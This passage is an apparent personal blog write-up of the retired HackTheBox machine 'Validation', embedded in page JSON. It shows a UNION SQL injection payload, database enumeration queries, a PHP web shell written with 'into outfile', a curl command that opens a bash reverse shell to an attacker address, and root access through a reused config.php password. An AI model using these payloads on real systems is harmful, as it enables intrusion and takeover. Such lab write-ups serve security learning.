1024w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/bbab3fe536e329528e641f802c96bf88/8ff5a/image-73-1024x651.png 240w,\n/static/bbab3fe536e329528e641f802c96bf88/e85cb/image-73-1024x651.png 480w,\n/static/bbab3fe536e329528e641f802c96bf88/d9199/image-73-1024x651.png 960w,\n/static/bbab3fe536e329528e641f802c96bf88/2bef9/image-73-1024x651.png 1024w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/bbab3fe536e329528e641f802c96bf88/d9199/image-73-1024x651.png\"\n            alt=\"image-73-1024x651.png\"\n            title=\"image-73-1024x651.png\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"union-injection\" style=\"position:relative;\"><a href=\"#union-injection\" aria-label=\"union injection permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>UNION Injection</h3>\n<p>So I went ahead and actually performed the SQLi.</p>\n<p>As you can also tell from the earlier Burp test, simply performing SQLi does not let us display the returned values.</p>\n<p>So I used a technique called UNION injection.</p>\n<p>UNION injection is an attack technique that uses a UNION query to poison an existing SQL query and combine its original result with the result of an arbitrary query.</p>\n<p>You can send a query like this.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token assign-left variable\">country</span><span class=\"token operator\">=</span>Brazil<span class=\"token string\">' UNION SELECT 1;-- -'</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>Reference: <a href=\"https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/#UnionInjections\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">SQL Injection Cheat Sheet | Netsparker</a></p>\n<p>From here, I used UNION injection to enumerate and exploit the database.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">-- Display the DB username\n<span class=\"token keyword\">select</span> user<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n-- Database name\n<span class=\"token keyword\">select</span> database<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n-- Enumerate schemas\n<span class=\"token keyword\">select</span> schema_name from information_schema.schemata\n\n-- Get tables\n<span class=\"token keyword\">select</span> table_name from information_schema.tables where table_schema <span class=\"token operator\">=</span> <span class=\"token string\">'&lt;table name>'</span>\n\n-- Get <span class=\"token function\">column</span> information\n<span class=\"token keyword\">select</span> column_name from information_schema.columns where table_name <span class=\"token operator\">=</span> <span class=\"token string\">'&lt;table name>'</span>\n\n-- Check user privileges\n<span class=\"token keyword\">select</span> privilege_type FROM information_schema.user_privileges where grantee <span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;username>\"</span>\n\n-- Write to a <span class=\"token function\">file</span> <span class=\"token punctuation\">(</span>only possible <span class=\"token keyword\">if</span> the user has FILE privilege<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">select</span> <span class=\"token string\">\"Test\"</span> into outfile <span class=\"token string\">'/var/www/html/Test.txt'</span>\n\n-- Write a web shell\n<span class=\"token keyword\">select</span> <span class=\"token string\">\"&lt;?php SYSTEM(<span class=\"token variable\">$_REQUEST</span>['cmd']); ?>\"</span> into outfile <span class=\"token string\">'/var/www/html/webshell.php'</span></code></pre></div>\n<p>What mattered most here was that the database user had the <code class=\"language-text\">FILE</code> privilege when I displayed its <code class=\"language-text\">privilege_type</code>.</p>\n<p>That means the DB user had permission to access files on the local system.</p>\n<p>Reference: <a href=\"https://dev.mysql.com/doc/refman/5.6/ja/privileges-provided.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">MySQL 5.6 Reference Manual: Privileges Provided by MySQL</a></p>\n<p>As a result, I was able to drop a web shell via SQLi using <code class=\"language-text\">into outfile</code>.</p>\n<p>After that, I could obtain the user flag by triggering a reverse shell against the web shell.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">curl</span> <span class=\"token string\">\"http://10.10.11.116/webshell.php\"</span> --data-urlencode <span class=\"token string\">\"cmd=bash -c '/bin/bash -l > /dev/tcp/10.10.0.0/4444 0&lt;&amp;1 2>&amp;1'\"</span></code></pre></div>\n<h2 id=\"privilege-escalation\" style=\"position:relative;\"><a href=\"#privilege-escalation\" aria-label=\"privilege escalation permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Privilege Escalation</h2>\n<p>After logging in locally, I looked at <code class=\"language-text\">config.php</code> and found the user’s password written there.</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token php language-php\"><span class=\"token delimiter important\">&lt;?php</span>\n  <span class=\"token variable\">$servername</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"127.0.0.1\"</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$username</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"uhc\"</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$password</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"uhc-9qual-global-pw\"</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$dbname</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"registration\"</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token variable\">$conn</span> <span class=\"token operator\">=</span> <span class=\"token keyword\">new</span> <span class=\"token class-name\">mysqli</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$servername</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$username</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$password</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$dbname</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token delimiter important\">?></span></span></code></pre></div>\n<p>With that, running <code class=\"language-text\">su root</code> gives you root privileges.</p>\n<h2 id=\"conclusion\" style=\"position:relative;\"><a href=\"#conclusion\" aria-label=\"conclusion permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Conclusion</h2>\n<p>I decided to study hacking seriously, so for now I plan to keep grinding retired machines.</p>","fields":{"slug":"/hackthebox-linux-validation-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2021-10-30","description":"This is a writeup of the retired HackTheBox machine \"Validation\".","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"[Easy/Linux] Validation Writeup (HackTheBox)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-linux-validation-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}